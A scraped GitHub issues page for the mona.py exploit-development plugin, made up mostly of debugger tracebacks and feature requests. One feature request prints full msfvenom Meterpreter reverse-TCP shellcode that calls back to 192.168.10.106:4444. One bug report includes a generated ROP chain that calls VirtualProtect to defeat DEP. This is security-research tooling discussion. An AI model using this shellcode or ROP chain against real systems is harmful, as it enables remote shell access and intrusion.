corelan / mona Goto Github PK
View Code? Open in Web Editor NEWCorelan Repository for mona.py
License: BSD 3-Clause "New" or "Revised" License
Corelan Repository for mona.py
License: BSD 3-Clause "New" or "Revised" License
When opening a new issue, please fill out the following sections:
mona.py completes the ropchain/rop chain creation function.
Mona throw errors when trying to produce VirtualProtect ropchain. The issue is the same case as someone here #44 but I got more errors.
************* Symbol Loading Error Summary **************
Module name Error
Tee710 The system cannot find the file specified
You can troubleshoot most symbol related issues by turning on symbol loading diagnostics (!sym noisy) and repeating the command that caused symbols to be loaded.
You should also verify that your symbol search path (.sympath) is correct.
Traceback (most recent call last):
File "C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\mona.py", line 2951, in getIAT
thisfuncfullname = thisfunc.getName().lower()
File "C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\windbglib.py", line 1819, in getName
syms = thismod.getSymbols()
File "C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\windbglib.py", line 1556, in getSymbols
ntHeader = getNtHeaders(self.modbase)
File "C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\windbglib.py", line 109, in getNtHeaders
return pykd.module("ntdll").typedVar(ntheaders, modulebase + pykd.ptrDWord(modulebase + 0x3c))
TypeException: _IMAGE_NT_HEADERS : symbol name is not found
** Error trying to process module TeeUI710.bpl
** Error trying to process module TeeUI710.bpl
Traceback (most recent call last):
File "C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\mona.py", line 2915, in getIAT
syms = themod.getSymbols()
AttributeError: 'NoneType' object has no attribute 'getSymbols'
** Error trying to process module JvDlgs100.bpl
** Error trying to process module JvDlgs100.bpl
Traceback (most recent call last):
File "C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\mona.py", line 2915, in getIAT
syms = themod.getSymbols()
AttributeError: 'NoneType' object has no attribute 'getSymbols'
** Error trying to process module vclactnband100.bpl
** Error trying to process module vclactnband100.bpl
Traceback (most recent call last):
File "C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\mona.py", line 2915, in getIAT
syms = themod.getSymbols()
AttributeError: 'NoneType' object has no attribute 'getSymbols'
** Error trying to process module JvStdCtrls100.bpl
** Error trying to process module JvStdCtrls100.bpl
Traceback (most recent call last):
File "C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\mona.py", line 2915, in getIAT
syms = themod.getSymbols()
AttributeError: 'NoneType' object has no attribute 'getSymbols'
** Error trying to process module rtl100.bpl
** Error trying to process module rtl100.bpl
Traceback (most recent call last):
File "C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\mona.py", line 2915, in getIAT
syms = themod.getSymbols()
AttributeError: 'NoneType' object has no attribute 'getSymbols'
** Error trying to process module VclSmp100.bpl
** Error trying to process module VclSmp100.bpl
Traceback (most recent call last):
File "C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\mona.py", line 2915, in getIAT
syms = themod.getSymbols()
AttributeError: 'NoneType' object has no attribute 'getSymbols'
** Error trying to process module TeeDB710.bpl
** Error trying to process module TeeDB710.bpl
Traceback (most recent call last):
File "C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\mona.py", line 2915, in getIAT
syms = themod.getSymbols()
AttributeError: 'NoneType' object has no attribute 'getSymbols'
** Error trying to process module xmlrtl100.bpl
** Error trying to process module xmlrtl100.bpl
Traceback (most recent call last):
File "C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\mona.py", line 2915, in getIAT
syms = themod.getSymbols()
AttributeError: 'NoneType' object has no attribute 'getSymbols'
** Error trying to process module JclVcl100.bpl
** Error trying to process module JclVcl100.bpl
Traceback (most recent call last):
File "C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\mona.py", line 2915, in getIAT
syms = themod.getSymbols()
AttributeError: 'NoneType' object has no attribute 'getSymbols'
** Error trying to process module Windows.StateRepositoryPS.dll
********************************************************************************
Traceback (most recent call last):
File "C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\mona.py", line 19097, in main
commands[command].parseProc(opts)
File "C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\mona.py", line 12050, in procROP
findROPGADGETS(modulecriteria,criteria,endings,maxoffset,depth,split,thedistance,fast,mode,sortedprint)
File "C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\mona.py", line 6558, in findROPGADGETS
vplogtxt = createRopChains(suggestions,interestinggadgets,ropgadgets,modulecriteria,criteria,objprogressfile,progressfile)
File "C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\mona.py", line 8812, in createRopChains
thischain[thisreg],skiplist = getPickupGadget(thisreg,funcptr,functext,suggestions,interestinggadgets,criteria,modulecriteria,routine)
File "C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\mona.py", line 9572, in getPickupGadget
allpointers = findPattern(modulecriteria,criteria,pattern,type,base,top)
File "C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\mona.py", line 7601, in findPattern
outside = getRangesOutsideModules()
File "C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\mona.py", line 5344, in getRangesOutsideModules
populateModuleInfo()
File "C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\mona.py", line 5818, in populateModuleInfo
thismod = MnModule(key)
File "C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\mona.py", line 2720, in __init__
mzbase = mod.getBaseAddress()
AttributeError: 'NoneType' object has no attribute 'getBaseAddress'
********************************************************************************
Thank you for your help Peter.
I'm trying to see if Mona has installed correctly by running simply commands against Notepad++. Below is the output that Mona gives me when I run the rop command (other commands that need module information appear to give similar output). This is on Windows 8.1 x64 (running a 32bit debugger).
0:009> !py mona rop
Hold on...
[+] Command used:
!py C:\Program Files (x86)\Windows Kits\8.1\Debuggers\x86\mona.py rop
---------- Mona command started on 2015-05-02 13:15:18 (v2.0, rev 557) ----------
[+] Processing arguments and criteria
- Pointer access level : X
[+] Generating module info table, hang on...
- Processing modules
** Error trying to process module image74150000
** Error trying to process module image00400000
** Error trying to process module kernel.appcore.dll
Traceback (most recent call last):
File "C:\Program Files (x86)\Windows Kits\8.1\Debuggers\x86\mona.py", line 17996, in main
commands[command].parseProc(opts)
File "C:\Program Files (x86)\Windows Kits\8.1\Debuggers\x86\mona.py", line 11257, in procROP
findROPGADGETS(modulecriteria,criteria,endings,maxoffset,depth,split,thedistance,fast,mode)
File "C:\Program Files (x86)\Windows Kits\8.1\Debuggers\x86\mona.py", line 5961, in findROPGADGETS
modulestosearch = getModulesToQuery(modulecriteria)
File "C:\Program Files (x86)\Windows Kits\8.1\Debuggers\x86\mona.py", line 5373, in getModulesToQuery
populateModuleInfo()
File "C:\Program Files (x86)\Windows Kits\8.1\Debuggers\x86\mona.py", line 5488, in populateModuleInfo
thismod = MnModule(key)
File "C:\Program Files (x86)\Windows Kits\8.1\Debuggers\x86\mona.py", line 2493, in init
mzbase = mod.getBaseAddress()
AttributeError: 'NoneType' object has no attribute 'getBaseAddress'
When I using the mona.py to create the Rop chains, then it stop
at this pos:
[+] Creating suggestions list
[+] Processing suggestions
[+] Launching ROP generator
[+] Attempting to produce rop chain for VirtualProtect
Step 1/7: esi
I am waiting for many hours, and still pause at there.
The env:
pykd 0.3
The Os:
windows 8
The python:
python 2.7
The commands:
.load pykd
!py mona
!py mona config -set workingfolder "C:\logs%p"
!py mona rop -m kernel32.dll,ntdll,msvcr120.dll
Hi there,
I am trying to use the mona.py module with Immunity debugger v1.85 but I get error message "pycommands: error importing module."
already did place mona.py file inside the pycommands folder.
Regards,
When opening a new issue, please fill out the following sections:
List the modules that don't have any memory checks
Type !mona modules
mona "current version" as of 10/16/2018, immunity debugger version 1.85, python 2.7.15, windows 10 64 current version
When opening a new issue, please fill out the following sections:
pycommands: error importing module
Windows 10 Home Native (no VM)
Immunity debugger using command !mona
Python 2.7 32-bit
PATH added
Other commands working like !list or !heap or !mike
I can see when I run any other command a .pyc file is created but that never happens when trying to use mona commands.
I verified the size of mona.py file and privileges. It keeps showing "pycommands: error importing module"
Please help
When opening a new issue, please fill out the following sections:
get rop chain
[+] Enumerating 22 endings in 1 module(s)...
- Querying module mshtml.dll
Traceback (most recent call last):
File "mona.py", line 19195, in main
commands[command].parseProc(opts)
File "mona.py", line 12147, in procROP
findROPGADGETS(modulecriteria,criteria,endings,maxoffset,depth,split,thedistance,fast,mode,sortedprint,technique)
File "mona.py", line 6380, in findROPGADGETS
found_opcodes = searchInModule(search,thismodule,criteria)
File "mona.py", line 5334, in searchInModule
return searchInRange(sequences, start, end, criteria)
File "mona.py", line 5214, in searchInRange
dbg.getMemoryPages()
File "C:\Program Files\Debugging Tools for Windows (x86)\windbglib.py", line 1063, in getMemoryPages
size = int(info[3].replace('`', ''), base=16)
ValueError: invalid literal for int() with base 16: 'MEM_IMAGE'
2:033> !py mona rop -m mshtml.dll
Hold on...
[+] Command used:
!py mona.py rop -m mshtml.dll
---------- Mona command started on 2022-10-27 22:17:13 (v2.0, rev 618) ----------
[+] Processing arguments and criteria
- Pointer access level : X
- Only querying modules mshtml.dll
[+] Generating module info table, hang on...
- Processing modules
- Done. Let's rock 'n roll.
[+] Preparing output file '_rop_progress_iexplore.exe_2592.log'
- (Re)setting logfile _rop_progress_iexplore.exe_2592.log
[+] Progress will be written to _rop_progress_iexplore.exe_2592.log
[+] Maximum offset : 40
[+] (Minimum/optional maximum) stackpivot distance : 8
[+] Max nr of instructions : 6
[+] Split output into module rop files ? False
[+] Going to create rop chains for all relevant/supported techniques:
[+] Enumerating 22 endings in 1 module(s)...
- Querying module mshtml.dll
Traceback (most recent call last):
File "mona.py", line 19195, in main
commands[command].parseProc(opts)
File "mona.py", line 12147, in procROP
findROPGADGETS(modulecriteria,criteria,endings,maxoffset,depth,split,thedistance,fast,mode,sortedprint,technique)
File "mona.py", line 6380, in findROPGADGETS
found_opcodes = searchInModule(search,thismodule,criteria)
File "mona.py", line 5334, in searchInModule
return searchInRange(sequences, start, end, criteria)
File "mona.py", line 5214, in searchInRange
dbg.getMemoryPages()
File "C:\Program Files\Debugging Tools for Windows (x86)\windbglib.py", line 1063, in getMemoryPages
size = int(info[3].replace('`', ''), base=16)
ValueError: invalid literal for int() with base 16: 'MEM_IMAGE'
windbg6.12
windows7 Pro
mshtml ver: File version: 8.0.7600.16385
Hello Peter,
I happened to dug into the implementation of the findwild
command and discovered undocumented and unimplemented (functionality) -type
switch.
If you don't plan to implement this feature then code associated with it can be safely removed (I pinned it in my local repository and can send a pull request if you approve).
On the other hand, if you plan to implement it how useful will be wildcard search for bin (opcode sequence) type? Is there a need to search for bytes, for example, like this -- \xFF?\x24*\x1C
-- with (?) representing single byte, and (*) representing any number of bytes? (I really don't know answer to this question since I'm just getting into the exploit development).
Checking RM2MP3Converter on Win 7 Ultimate x64, an invalid opcode was returnd in rop.txt
0x100150xx : # PUSH EAX # ADD DWORD PTR DS:[EAX],EDX # MOV EAX,1 # RETN ** [MSRMfilter03.dll] ** | {PAGE_EXECUTE_READ}
0x100150xx : # LEA EDX,ESP # PUSH EAX # ADD DWORD PTR DS:[EAX],EDX # MOV EAX,1 # RETN ** [MSRMfilter03.dll] ** | {PAGE_EXECUTE_READ}
as can be seen, LEA EDX,ESP
has been suggested, which is an invalid opcode, AFAIK.
When opening a new issue, please fill out the following sections:
Code is written in Python 3.
Code is written in Python 2.7.
Check dependencies in README.md file.
Python 2.7 is EOL as of 9 days ago, (01/01/2020).
It seems functions about finding ROP gadget only assume that it's on x86 architecture. Is supporting for amd64 in development?
Mona should spit back data when launched (!mona) from the Immunity Debugger 1.85
pycommands: error importing module
....
line 87 in
import urllib ...
Error Image here
installed Immunity Debugger and updated from python 2.7.1 to python 2.7.14
added mona.py to the PyCommands folder
started Immunity Debugger as an admin
use !mona
OS: Windows 7 x64 SP 1
immunity debugger 1.85
mona.py completes the ropchain/rop chain creation function.
mona.py hangs at Step 1/7 for finding gadgets for VirtualProtect, outputting the following. (See picture below.)
Open WinDBG x86, attach to an already running x86 program; and run .load pykd.pyd
; followed by either !py mona rop
or !py mona rop -m kernel32.dll
Latest pykd, (0.3.2.2), Latest mona.py revision (2.0 r599), Windows 10 Pro x64, WinVer 1809, WinDBGx86. I have used this against my target along with !py mona rop -m kernel32.dll
(Presumably) both progress to another error (this was after me going to sleep) which I regret not logging, mentioning .symfix
. Same results. - Run in a vanilla FLARE_VM, aside from software I am trying to exploit. _NT_SYMBOL_PATH = srv*c:\symbols*http://msdl.microsoft.com/download/symbols
Have had issues with mona/windbglib in the past, reference here
Edit: Seems to be a symbol problem. Taking a VM snapshot and will experiment. I'm a primary Linux guy, any help is appreciated.
^ Related error.
tier0.dll is a proprietary, non-standard .dll - could this be why?
Request feature x64dbg/x64dbgpy#6
When opening a new issue, please fill out the following sections:
Mona.py should create rop_chains.txt and rop.txt files after running one of the following commands:
!mona rop -m slmfc.dll -n -cpb "\x00\x0a\x0d"
!mona rop -m slmfc.dll -n cpb "\x00\x0a\x0d"
!mona rop -m *.dlll -n cpb "\x00\x0a\x0d"
!mona rop -m *.dlll -n -cpb "\x00\x0a\x0d"
!mona rop
!mona rop -m slmfc.dll
Mona throws an
_rop_progress_SLmail.exe_1164.log
error (see screenshot).
I see local variable referenced before assignment error on a splash screen ( could not capture that error though)
Hi,
I used the latest version of Mona.py and had a bug when calculating the return address to virtualprotect ,
it forgot to calculate an add al,0EFh that will ocour before the virtual protect call.
Thanks for the helpful tool though,
Gadi
*** [ Ruby ] ***
def create_rop_chain()
# rop chain generated with mona.py - www.corelan.be
rop_gadgets =
[
0x7c373fda, # POP EBP # RETN [msvcr71.dll]
0x7c373fda, # skip 4 bytes [msvcr71.dll]
0x7c376747, # POP EAX # RETN [msvcr71.dll]
0xfffffdff, # Value to negate, will become 0x00000201
0x7c352155, # NEG EAX # RETN [msvcr71.dll]
0x7c341748, # POP EBX # RETN [msvcr71.dll]
0xffffffff, #
0x7c345255, # INC EBX # FPATAN # RETN [msvcr71.dll]
0x7c363cff, # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN [msvcr71.dll]
0x7c344f8e, # POP EDX # RETN [msvcr71.dll]
0xffffffc0, # Value to negate, will become 0x00000040
0x7c351eb1, # NEG EDX # RETN [msvcr71.dll]
0x7c34f7a0, # POP ECX # RETN [msvcr71.dll]
0x7c38fd9f, # &Writable location [msvcr71.dll]
0x7c342953, # POP EDI # RETN [msvcr71.dll]
0x7c34d202, # RETN (ROP NOP) [msvcr71.dll]
0x7c36374d, # POP ESI # RETN [msvcr71.dll]
0x7c3415a2, # JMP [EAX] [msvcr71.dll]
0x7c34728e, # POP EAX # RETN [msvcr71.dll]
0x7c37a140, # ptr to &VirtualProtect() [IAT msvcr71.dll] ---- BUG Error should be 7c37a151 ( will get eax to 0x7c37a140 when add al,0EFh; )
0x7c378c81, # PUSHAD # ADD AL,0EF # RETN [msvcr71.dll]
0x7c345c30, # ptr to 'push esp # ret ' [msvcr71.dll]
].flatten.pack("V*")
MOna version :
"""
VERSION = '2.0'
REV = filter(str.isdigit, '$Revision: 545 $')
IMM = '1.8'
DEBUGGERAPP = ''
arch = 32
win7mode = False
Work in progress: https://github.com/wangray/mona
How likely is this to get merged? Should we maintain x64dbg support separately? @corelanc0d3r
jmp esp
upon executing !mona jmp -r esp
!mona jmp -r esp
command and observe the output!mona find -s '\xff\xe4'
this works fineThe script should run without crashing even if a system uses Python3 as default.
The script crashes when loaded with Python3, the current supported version which is becoming more standard.
python mona.py
on a system for which Python3 is default.
I suggest adding the following shebang to mona.py
.
#!/usr/bin/env python2.7
As an example, trying to load Mona from Immunity Debugger on a Windows system with Python3 as default will result in an error. By adding that shebang, Mona loads fine if the system also has Python2.7 installed.
Your tool/software has been inventoried on Rawsec's CyberSecurity Inventory.
https://inventory.rawsec.ml/tools.html#Mona
An inventory of tools and resources about CyberSecurity. This inventory aims to help people to find everything related to CyberSecurity.
More details about features here.
Note: the inventory is a FLOSS (Free, Libre and Open-Source Software) project.
Mainly because this is giving visibility to your tool and improve its referencing.
The badge shows to your community that your are inventoried. It looks good but also shows you care about your project, that your tool is referenced.
Feel free to claim your badge here: http://inventory.rawsec.ml/features.html#badges, it looks like that , but there are several styles available.
If you want to thank us, you can help make our open project better known by tweeting about it! For example:
That's all, this message is just to notify you if you care. Else you can close this issue.
0:015> !nmod
00030000 0003c000 CRYPTBASE NO_SEH *ASLR *DEP C:\Windows\syswow64\CRYPTBASE.dll
00230000 00239000 netutils /SafeSEH ON /GS *ASLR *DEP C:\Windows\SysWOW64\netutils.dll
00240000 0024f000 wkscli /SafeSEH ON /GS *ASLR *DEP C:\Windows\SysWOW64\wkscli.dll
00320000 0032d000 wshbth /SafeSEH ON /GS *ASLR *DEP C:\Windows\SysWOW64\wshbth.dll
00330000 0033a000 NO_SEH *ASLR *DEP C:\Program Files (x86)\masked
\masked.dll
Narly and SafeSEH says my module masked.dll is safeSEH OFF. But mona on windbg & Immunity doesn't say the same. Infact, I see 4-6 safeSEH modules with other plugins but mona says all are SEH protected. Probably that's why "!mona seh" results into nothing.
Tested on Windows 7 64-bit with WinDbg:6.12.0002.633 x86 and Immunity v1.85
Where is the priority:ultra-low switch? :)
For some reason the reference to my URL in one of the comments has a typo:
http://www.floyd.cd
it should be
http://www.floyd.ch
cheers,
floyd
Setup -- OS: Windows XP SP 3 Eng, program - Easy RM to MP3 Converter (from Exploit Writing Tutorial, part 1 on corelan.be), latest version of mona recently pulled from Github, Immunity Debugger v1.85
Command !mona seh
finds duplicate addresses and give incorrect instruction for the opcode sequence for one of the found cases:
0x00436213 : jmp dword ptr ss:[esp+1c]
| startnull,ascii {PAGE_EXECUTE_READ} [RM2MP3Converter.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2.7.3.700 (C:\Program Files\Easy RM to MP3 Converter\RM2MP3Converter.exe)
0x00436213 : call dword ptr ss:[esp+1c]
| startnull,ascii {PAGE_EXECUTE_READ} [RM2MP3Converter.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2.7.3.700 (C:\Program Files\Easy RM to MP3 Converter\RM2MP3Converter.exe)
The opcode at the 0x00436213
address is FF54241C
which corresponds to call dword [esp+0x1c]
instruction.
The plug-in was installed in accordance with the https://github.com/corelan/windbglib
I tried different versions of this plugin, including the last one
I assume that this error has been discussed many times, but I have not found solutions to this problem
0:000> !py mona jmp -r ESP
Hold on...
[+] Command used:
!py mona.py jmp -r ESP
---------- Mona command started on 2017-10-15 04:41:48 (v2.0, rev 570) ----------
[+] Processing arguments and criteria
- Pointer access level : X
[+] Generating module info table, hang on...
- Processing modules
Traceback (most recent call last):
File "mona.py", line 18207, in main
commands[command].parseProc(opts)
File "mona.py", line 11212, in procFindJMP
all_opcodes=findJMP(modulecriteria,criteria,args["r"].lower().strip())
File "mona.py", line 5846, in findJMP
modulestosearch = getModulesToQuery(modulecriteria)
File "mona.py", line 5466, in getModulesToQuery
populateModuleInfo()
File "mona.py", line 5577, in populateModuleInfo
allmodules=dbg.getAllModules()
File "C:\dbgs\WinDbg\windbglib.py", line 1160, in getAllModules
getModulesFromPEB()
File "C:\dbgs\WinDbg\windbglib.py", line 366, in getModulesFromPEB
moduleLst = pykd.typedVarList(peb.Ldr.deref().InLoadOrderModuleList, "ntdll!_LDR_DATA_TABLE_ENTRY", "InMemoryOrderLinks.Flink")
TypeException: _LDR_DATA_TABLE_ENTRY : symbol name is not found
Summary:
I've been working on a feature to Compare a file created by msfvenom/gdb/hex/xxd/hexdump/ollydbg with a copy in memory. It is similar to the command "compare" but instead of reading from a binary file, it read and parse output from msfvenom, gdb, and a few others.
The idea is to quickly compare the integrity of the injected shellcode
The feature is ported from expdevBadChars (https://github.com/mgeeky/expdevBadChars), which i find it quite useful.
I've written a working alpha build on a forked branch, but the code still need some touch up before i submit a PR. I am just wondering if you are OK with the added feature and would consider a merge on upstream?
https://github.com/onlylonly/mona/tree/advcompare-alpha
Example
Some demonstration & example of the proposed feature
content of file 2a.txt
root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.10.106 LPORT=4444 -f py
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 341 bytes
Final size of py file: 1644 bytes
buf = ""
buf += "\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b"
buf += "\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7"
buf += "\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf"
buf += "\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c"
buf += "\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01"
buf += "\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31"
buf += "\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d"
buf += "\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66"
buf += "\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0"
buf += "\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f"
buf += "\x5f\x5a\x8b\x12\xeb\x8d\x5d\x68\x33\x32\x00\x00\x68"
buf += "\x77\x73\x32\x5f\x54\x68\x4d\x77\x26\x07\x89\xe8\xff"
buf += "\xd0\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80"
buf += "\x6b\x00\xff\xd5\x6a\x0a\x68\xc0\xa8\x0a\x6a\x68\x02"
buf += "\x00\x11\x5c\x89\xe6\x50\x50\x50\x50\x40\x50\x40\x50"
buf += "\x68\xea\x0f\xdf\xe0\xff\xd5\x97\x6a\x10\x56\x57\x68"
buf += "\x99\xa5\x74\x61\xff\xd5\x85\xc0\x74\x0a\xff\x4e\x08"
buf += "\x75\xec\xe8\x67\x00\x00\x00\x6a\x00\x6a\x04\x56\x57"
buf += "\x68\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7e\x36\x8b"
buf += "\x36\x6a\x40\x68\x00\x10\x00\x00\x56\x6a\x00\x68\x58"
buf += "\xa4\x53\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57\x68"
buf += "\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7d\x28\x58\x68"
buf += "\x00\x40\x00\x00\x6a\x00\x50\x68\x0b\x2f\x0f\x30\xff"
buf += "\xd5\x57\x68\x75\x6e\x4d\x61\xff\xd5\x5e\x5e\xff\x0c"
buf += "\x24\x0f\x85\x70\xff\xff\xff\xe9\x9b\xff\xff\xff\x01"
buf += "\xc3\x29\xc6\x75\xc1\xc3\xbb\xf0\xb5\xa2\x56\x6a\x00"
buf += "\x53\xff\xd5"
the mona command
!mona advcompare -f d:\tmp\2a.txt -a 0019FC80
or
!mona advcompare -f d:\tmp\2a.txt -a 0019FC80 -t msfvenom-python
if parameter -t (format type) is supplied, mona will honor the user supplied format, otherwise, mona will attempt to guess the format type based on regular expression.
Looking to hearing from you, and thanks for sharing & maintaining mona.py. Its a wonderful tool.
Hi,
I tried to use an egghunter with checksum verification generated by mona but it crashed.
Through step by step execution I identified that the last conditional jump was wrong.
You'll find the corresponding mona output attach to this message.
You can easly see what I'm talking about by copying / pasting the egghunter into a debugger.
You'll see that the last conditional jump points to an address between two instructions.
I thought at first that it was a sort of code length optimization but this is not the case.
To fix it I modified the jump to point to the "INC EDX".
If "Debugging options -> Disasm -> Disassemble in lowercase" is enabled, !mona rop produces invalid results. !mona stackpivot doesn't produce any results.
Suggestions how to fix this (pick one):
When opening a new issue, please fill out the following sections:
!mona modules should be running
Error dll load failed 1 is not a valid win32 application
1, Donwload mona
2, Copy it to pycommands of ID
3, run !mona modules
4, Got error: dll load failed 1 is not a valid win32 application
Mona: Newest version
ID: v1.85
OS: Windows 10 (64 bits)
Once i execute a command,it'l give me this information.
My OS is window 7 64bit.
I install 32bit windbg and 64bit windbg both.
The 32bit windbg can execute the mona plugin success ,but the 64bit windbg will give me this information:
0:000> !py mona modules
Hold on...
[+] Command used:
!py mona.py modules---------- Mona command started on 2016-12-13 01:39:34 (v2.0, rev 567) ----------
[+] Processing arguments and criteria
- Pointer access level : X
[+] Generating module info table, hang on...
- Processing modules
** Error trying to process module api_ms_win_crt_locale_l1_1_0
** Error trying to process module api_ms_win_core_processthreads_l1_1_1
** Error trying to process module api_ms_win_crt_convert_l1_1_0
** Error trying to process module api_ms_win_crt_stdio_l1_1_0
** Error trying to process module ConsoleApplication5
** Error trying to process module kernel32
** Error trying to process module api_ms_win_core_localization_l1_2_0
** Error trying to process module api_ms_win_core_file_l2_1_0
** Error trying to process module ntdll
** Error trying to process module api_ms_win_core_timezone_l1_1_0
** Error trying to process module ucrtbase
** Error trying to process module api_ms_win_crt_heap_l1_1_0
** Error trying to process module api_ms_win_core_synch_l1_2_0
** Error trying to process module KERNELBASE
** Error trying to process module VCRUNTIME140
** Error trying to process module api_ms_win_core_file_l1_2_0
** Error trying to process module api_ms_win_crt_string_l1_1_0
** Error trying to process module api_ms_win_crt_runtime_l1_1_0
** Error trying to process module api_ms_win_crt_math_l1_1_0
** Error trying to process module api-ms-win-core-synch-l1-2-0.dll
Traceback (most recent call last):
File "mona.py", line 18183, in main
commands[command].parseProc(opts)
File "mona.py", line 11240, in procShowMODULES
modulestosearch = getModulesToQuery(modulecriteria)
File "mona.py", line 5442, in getModulesToQuery
populateModuleInfo()
File "mona.py", line 5557, in populateModuleInfo
thismod = MnModule(key)
File "mona.py", line 2538, in init
mzbase = mod.getBaseAddress()
AttributeError: 'NoneType' object has no attribute 'getBaseAddress'
and every command can't be execute yet
0:000> !py mona rop
Hold on...
[+] Command used:
!py mona.py rop---------- Mona command started on 2016-12-13 01:45:00 (v2.0, rev 567) ----------
[+] Processing arguments and criteria
- Pointer access level : X
[+] Generating module info table, hang on...
- Processing modules
** Error trying to process module api_ms_win_crt_locale_l1_1_0
** Error trying to process module api_ms_win_core_processthreads_l1_1_1
** Error trying to process module api_ms_win_crt_convert_l1_1_0
** Error trying to process module api_ms_win_crt_stdio_l1_1_0
** Error trying to process module ConsoleApplication5
** Error trying to process module kernel32
** Error trying to process module api_ms_win_core_localization_l1_2_0
** Error trying to process module api_ms_win_core_file_l2_1_0
** Error trying to process module ntdll
** Error trying to process module api_ms_win_core_timezone_l1_1_0
** Error trying to process module ucrtbase
** Error trying to process module api_ms_win_crt_heap_l1_1_0
** Error trying to process module api_ms_win_core_synch_l1_2_0
** Error trying to process module KERNELBASE
** Error trying to process module VCRUNTIME140
** Error trying to process module api_ms_win_core_file_l1_2_0
** Error trying to process module api_ms_win_crt_string_l1_1_0
** Error trying to process module api_ms_win_crt_runtime_l1_1_0
** Error trying to process module api_ms_win_crt_math_l1_1_0
** Error trying to process module api-ms-win-core-synch-l1-2-0.dll
Traceback (most recent call last):
File "mona.py", line 18183, in main
commands[command].parseProc(opts)
File "mona.py", line 11341, in procROP
findROPGADGETS(modulecriteria,criteria,endings,maxoffset,depth,split,thedistance,fast,mode)
File "mona.py", line 6033, in findROPGADGETS
modulestosearch = getModulesToQuery(modulecriteria)
File "mona.py", line 5442, in getModulesToQuery
populateModuleInfo()
File "mona.py", line 5557, in populateModuleInfo
thismod = MnModule(key)
File "mona.py", line 2538, in init
mzbase = mod.getBaseAddress()
AttributeError: 'NoneType' object has no attribute 'getBaseAddress'
When opening a new issue, please fill out the following sections:
Typically, a README.md file contains a summary of what the project is/does, and also contains references to further documentation.
There is no documentation found in this repository.
Check the README.md file for any documentation or references.
N/A
Possible to use the mona plugin in immuniy debugger 1.85.
!mona
PyCommands: error importing module
add mona.py to the PyCommands folder
start Immunity Debugger
use !mona
OS: Windows xp
immuniy debugger 1.85
Is it possible to automate the proccess to open Immunity debugger and run mona without need to open the GUI
!mona to run the file ?
I want to write a spreate python file to do that is it possible threw the API
Hi,
Sometimes we can control values at esp-0x???, it would be great if the -distance option can take a negative value :)
Thank you
Crash when I run the command: !mona rop -m ntdll
Included exe file and log files:
_rop_progress_for_testing.exe_1792.log
Log.txt
for_testing_exe_.txt
Windows 7 SP1 syswow64 folder: ntdll_dll_.txt
Windows 7 x64 on vmware workstation
4 GB RAM for the VM!
I am running Immunity debugger as administrator
Installed visual studio 2017 c++ redistributable x32
Python 2.7.16 (v2.7.16:413a49145e, Mar 4 2019, 01:30:55) [MSC v.1500 32 bit (Intel)] on win32
Immunity debugger 1.85
Mona Plugin version : 2.0 r585 (latest update)
With a custom workingfolder configured, when using !mona compare -a ESP -f bytearray.bin
the file bytearray.bin
should be found in the workingfolder.
Unable to find/read file bytearray.bin
!mona config -set workingfolder C:\immdbg\%p
!mona bytearray
!mona compare -a ESP -f bytearray.bin
Hi :)
I think it could be helpful if the output to rop.txt (and possibly other files as well?) would be sorted, by anything. I would use a default sorting by address, but perhaps if there are more sorting ideas it's possible to add a command line flag to change default behavior.
Sounds to me like it's basically casting a set to a list and calling sort at some point in the code, but seeing as it's a 18+ KLOC file, it's hard for me to tell for certain.
Just seeing if anyone else is have 'Error importing module' for importing into Immunity Debugger 1.85 32 bit OS.
A declarative, efficient, and flexible JavaScript library for building user interfaces.
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
